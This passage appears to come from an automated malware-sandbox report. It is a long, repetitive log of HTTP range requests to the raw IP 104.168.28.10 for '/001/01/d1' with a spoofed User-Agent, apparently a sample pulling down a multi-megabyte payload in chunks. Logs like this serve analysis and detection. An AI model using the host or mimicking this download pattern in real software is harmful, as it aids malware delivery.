Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=786432-917503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=917504-933887User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=933888-966655User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=966656-1032191User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1032192-1048575User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1048576-1114111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1114112-1122303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1122304-1130495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1114112-1122303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=13116-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=127798-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=62264-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1130496-1163263User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1163264-1196031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1196032-1212415User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1212416-1245183User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=13116-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1245184-1249279User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1249280-1314815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1314816-1380351User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1380352-1388543User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1388544-1396735User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1396736-1429503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1429504-1560575User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1560576-1691647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1691648-1708031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1708032-1740799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1740800-1757183User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1757184-1773567User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1773568-1806335User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1806336-1871871User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1871872-1888255User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1888256-1921023User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1921024-1937407User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1937408-2002943User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1871872-1888255User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2002944-2035711User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2035712-2166783User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2166784-2297855User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2297856-2330623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2330624-2363391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2363392-2428927User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2428928-2445311User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2445312-2453503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2453504-2486271User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2486272-2551807User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2551808-2617343User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2617344-2633727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2633728-2637823User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2637824-2670591User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2670592-2703359User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2703360-2719743User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2719744-2727935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2727936-2760703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2760704-2826239User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2826240-2842623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2842624-2875391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2875392-2891775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2891776-2924543User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2924544-2940927User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2940928-3006463User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2940928-3006463User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3006464-3022847User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3022848-3055615User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3055616-3088383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3088384-3096575User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3096576-3112959User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3112960-3121151User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3121152-3137535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3137536-3153919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3153920-3170303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3170304-3174399User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3174400-3207167User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3207168-3215359User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3170304-3174399User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3215360-3231743User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3231744-3239935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3239936-3248127User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3248128-3280895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3280896-3289087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3289088-3305471User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3305472-3321855User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3321856-3338239User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3338240-3354623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3354624-3371007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3371008-3403775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3403776-3411967User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3411968-3420159User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3420160-3452927User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3371008-3403775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3452928-3469311User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3469312-3477503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3477504-3510271User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3510272-3514367User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3514368-3547135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3547136-3563519User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3563520-3579903User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3579904-3596287User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3596288-3604479User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3514368-3547135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3563520-3579903User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3604480-3637247User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3637248-3641343User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3641344-3657727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3657728-3665919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3665920-3674111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3674112-3690495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3690496-3706879User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3665920-3674111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3706880-3708927User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3708928-3741695User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3741696-3758079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3758080-3790847User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3790848-3799039User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3741696-3758079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3799040-3803135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3790848-3799039User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3803136-3807231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3807232-3815423User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3803136-3807231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3815424-3823615User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
